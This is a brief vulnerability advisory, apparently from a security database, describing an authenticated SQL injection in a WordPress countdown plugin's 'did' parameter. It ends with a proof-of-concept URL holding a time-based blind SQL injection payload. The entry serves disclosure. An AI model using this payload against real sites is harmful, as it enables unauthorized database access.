EPSS
Percentile
37.7%
The plugin does not sanitize user input into the ‘did’ parameter and uses it in a SQL statement, leading to an authenticated SQL Injection.
https://example.com/wp-admin/admin.php?page=mwp-countdown&info;=del&did;=1+AND+(SELECT+5382+FROM+(SELECT(SLEEP(5)))PpNt)